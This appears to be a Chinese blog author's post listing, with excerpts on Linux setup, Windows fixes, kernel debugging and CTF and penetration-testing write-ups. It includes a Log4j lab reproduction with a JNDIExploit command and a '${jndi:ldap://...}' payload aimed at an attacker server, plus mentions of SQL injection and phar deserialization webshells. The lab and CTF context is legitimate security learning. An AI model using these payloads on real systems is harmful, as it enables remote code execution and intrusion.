- 博客(29)
- 收藏
- 关注
RSS订阅原创 Cloudflared WARP client 在LInux上的安装
耗时一个白天+一个晚上,成功的时候心情大好!前提是你已经有一个cloudflare 账号,并且注册了teams。有空再写如何注册 Zero Trust终于发现一篇文章,参考官方文章。
2023-12-14 18:16:48
5432
8
原创 掌控者-封神台-Apache Log4j任意代码执行复现
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结一、工具JNDIExploit-1.2-SNAPSHOT.jar二、靶场看网页源码猜测就是username和password为注入点三、步骤vps有java环境java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP成功运行向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.
2022-04-06 23:37:41
5706
3
原创 WinDbg x64内核之寻找KdVersionBlock
😀Win 10 x64 内核之 寻找KdVersionBlock一、_KPCR二、_DBGKD_GET_VERSION64总结找这个的目的是什么的就不说了。提示:以下是本篇文章正文内容,下面案例可供参考一、_KPCR由于Windows需要支持多个CPU, 因此Windows内核中为此定义了一套以处理器控制区(Processor Control Region)即KPCR为枢纽的数据结构, 使每个CPU都有个KPCR. 其中KPCR这个结构中有一个域KPRCB(Kernel Processo.
2022-03-27 14:12:02
1314
原创 C 数组与字符串与strcpy
#include <stdio.h>#include <string.h>int stack_over(void); int main(void) { char A[10] = "AAAAAAAAAA"; printf("%d\n",stack_over();); return 1; }int stack_over(void){ char arr[9]; char *str = "12345678"; strncpy(arr, str, 8.
2021-10-18 22:17:27
125
原创 microsoft store 无法找到和无法联网的问题
无法找到1.在打开的“管理员:Windows Powershell”窗口中输入以下命令:get-appxpackage *store* | remove-Appxpackage2.再次安装:add-appxpackage -register "C:\Program Files\WindowsApps\*Store*\AppxManifest.xml" -disabledevelopmentmode然后大概率就会有了,如果还是没有,那就找找其他办法吧。。。。无法联网显示Micr
2021-08-03 10:49:37
499
原创 CMD以管理员权限运行【一步到位】
目录思路:效果展示(不好展示)思路:使用SHELLEXECUTEINFO,然后生成root.exe可执行文件,然后将root.exe放到c:\\windows\\system32(或者环境变量PATH下的其他代码,root.cpp,使用的vc 6++编译#include <windows.h>#include <stdio.h>extern "C" WINBASEAPI HWND WINAPI GetConsoleWindow ();VOID..
2021-08-02 16:29:47
1476
原创 phar://反序列化的利用【windows远程登录】
前言一、环境搭建二、详细解释1.phar反序列化2.关键13.关键2三、运行测试四、总结前言看到CTF很多题都有关于phar://绕过文件上传配合反序列化利用的。但是实战中大概率不存在这么巧合的点。在了解phar://时,看很多博客都是写入phpinfo()来执行的。我突发脑洞,既然可以执行phpinfo,那么可不可以写马获得shell呢?由于对php对象不是很了解,踩了很多坑记录一下。windows server 2008、php5.5.38、...
2021-07-16 14:40:33
666
2
原创 Mysql注入实战
mysql注入【实战】-报错注入与布尔盲注报错注入布尔盲注请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。未经过授权,禁止非法测试。报错注入靶场如图。没有验证码防止爆破。打开burp,试试有没有SQL注入。burp抓包如下:居然有错误回显,那没得说了。直接上sqlmap,但是没有成功。不知道为什么,显示404 not found好吧。那就借助burp半自动好了。查看用户user(),database(),version()refurl=&us
2021-07-14 00:25:28
195
原创 URL编码及其其他编码问题
目录URL编码ASCII与拓展的ASCII显然,有些ASCII可打印字符必须编码才能传输抓包查看URL编码后的数据unicode编码、utf-8编码、UCS、UTFANSI、gb系列、Big-5特殊情况下的URL编码(表单提交)文件存储与编码URL解码总结这篇博客接上一篇由XCTF-favorite_number引发的PHP 数组问题与URL编码引出的编码问题URL编码URL编码是为了解决url中 可能存在歧义的字符以及不在网络标准RFC1738中规定的字符。RFC3986文档规定,Url中只允许
2021-03-14 23:40:04
2141
原创 由XCTF-favorite_number引发的PHP 数组问题与URL编码引出的编码问题
PHP数组这个ctf题有很多大佬的WP就不写了讨论PHP数组问题(数字索引数组)题目本地模拟这个ctf题有很多大佬的WP就不写了第一个比较是数组的强等于 但是由要求两个数组的第一个元素不等WP的payloadstuff[4294967296]=admin&stuff[1]=user&num=123讨论PHP数组问题(数字索引数组)实验环境:WINDOWS10,PHPstudy(Apache2.4.39,php5.5.9nts)在 PHP 中,有三种数组类型:• 索引数组
2021-03-13 23:03:05
269
原创 XCTF-fakebook
XCTF-fakebook----做题萌新的记录思考上第一步:浏览所有环境第三步 敏感目录扫描第二步:找出漏洞所在下查看御剑的扫描结果那怎么利用SSRF呢??总结萌新的记录萌新记录一下这个题,个人感觉这个题比较有综合性。思考第一次总结一下WEB题思路,本次解题想法来自诸多大佬的博客。上第一步:浏览所有环境浏览整个网站环境,发现有两个连接,login 和join。加上首页index,目前发现三个,然后F12分别查看index源码,没有发现什么线索。然后有join和login,多半是自己创建账号
2021-03-12 22:43:02
611
原创 华为云aarch64架构 curl命令错误 解决方法
curl: (48) An unknown option was passed in to libcurl忘了什么时候发现有问题的网上博客查看自己安装的curl删除curl,并安装curl,查看curl版本尝试安装7.58.0思考:linux执行curl命令调用的curl文件夹路径下一步怎么办??怎么添加文件夹呢/bin/sbin/usr/bin/usr/sbin启用之后最后忘了什么时候发现有问题的这个问题一致存在,解决了好几次都没有解决。最近,实在忍不住了,作为网安人,居然连个命令都用不了,所以面子硬
2021-03-12 00:39:11
1151
原创 burpsuit2020.x 光标 有问题(实测有效)
burpsuit2020.x 光标 有问题 (实测有效)启动burp的时候,编辑启动脚本,加上参数:-Dsun.java2d.uiScale=1
2021-03-07 22:40:00
1434
5
原创 WINDOWS10 右键文件夹空白处 点击右键选项进入当前DOS/CMD 文件夹所在路径
进入注册表:WIN+R 输入“regedit”进入:HKEY_CLASSES_ROOT\Directory\Background\shell在shell新建项—“DOS”在“DOS”新建项–“command”,点击command的“默认”输入命令c:\windows\system32\cmd.exe /s /k pushd “%V”然后确定...
2021-03-07 16:43:24
454
原创 bugku【小猪佩奇】
小猪佩奇参考的大佬博客,主要完善细节参考的大佬博客,主要完善细节参考大佬博客链接 URL首先是完全没有思路,然后提示有给作者的名字 然后百度发现了一篇csdn 出题者的提示然后还是不会,是一个字典,难道与压缩包有关???还是或者说带密码的图片隐写??这个 LSB隐写加密的思路 和 相关脚本 emmm 大佬们太强了,本菜鸡只有照葫芦画瓢了。。。。脚本链接 github 两个脚本 lsb 和 crypt字典链接, 自行百度,github上有 算了勤快一点,点这里 然后ctrl+s保存就可以
2021-03-04 23:00:07
791
3
原创 BUGKU-MISC【善用工具】
【善用工具】下载题目文件解压,有个hint.png 直接010e 发现是txt文件在txt文件最后面发现一串字符。。。。。(菜鸟不知道是什么编码,问了群里大佬,说是uuencode+base85)uuencode 解码网址 url解码结果:keyis91;utF$jAQDfoZ.@:s-关键的字符串:91;utF$jAQDfoZ.@:s-base85解码结果:KEYisCamouflage关键字符串:Camouflageemmm 然后对Camouflage各种思考都不得其解 联系到善用工
2021-02-16 10:48:13
704
原创 华为云 Ubuntu ARM架构 搭建 MYSQL5.7
华为云 Ubuntu ARM架构 搭建 MYSQL华为云 Ubuntu ARM架构 搭建 MYSQL搭了好几次都没弄好ARM上的mysql,疯狂吐槽华为(因为买服务器的时候没有标清楚服务器架构,????),这次终于搭好了。解决方法:华为云的ARM源以及报错解决换源 ,参考链接: https://blog.csdn.net/weixin_41831919/article/details/108371129.。wget -O /etc/apt/sources.list http://mirrors
2021-01-21 22:04:47
467
2
原创 visual studio code 远程编辑服务器文件
VS code 远程开发软件或插件准备vs codevs code 的插件:remote_browsernode.jsnode.js的扩展包:ssh2-sftp-client流程11. node.js安装 地址:[node.js](https://nodejs.org/en/download/)2. 环境变量配置,如图,我node.js安装在d://nodejs,将自己的安装路径写入,保存注入还是字符型注入http://192.168.111.129/sqli-labs/Less-1/index.php?id=1‘报错语句,用单引号括起来的的猜测提交的参数是 1’–+ 是注释,其实- -和#才是注释,在url中,+会变成空格,–'也可以那为什么不能用#号呢,因为url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#将#号改成ur
2020-07-14 23:31:56
165
原创 CTF-misc-----buuctf-FLAG
CTF-MISCBUUctf misc-> FLAG最近做buuctf-misc,在FLAG卡了很久。因为没有提示,所以度了一下,有一个博客,但是不详细,故在这再写一下MISC-图片右键—属性,看大小(可能藏文件),看备注之类的linux下用foremost命令分离,windows用一个我忘了名字的exe(可找我要)。看看有没有结果ultraedit查看具体内容,观察有没有特殊情况;或者上stego,然后各种analysis都试试。gif可以用stego帧查看,然后就是LSB 隐写,r
2020-05-24 12:42:52
4617
原创 ubuntu18.04 安装lnmp php时出错
@ubuntu18.04 安装lnmp php时出错报错代码lnmp Starting php-fpm /etc/init.d/php-fpm: 57: /etc/init.d/php-fpm: /usr/loc…Error:PHP install Failed;方法查看 root下的 lnmp-install.log 文件cd root/ 笔者的原因是php编译时很多.c .cpp .h文件报错ubuntu18.04的gcc和g++ 版本太低因此要切换到高版本cd到/usr/bin下
2020-05-21 12:31:33
349
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人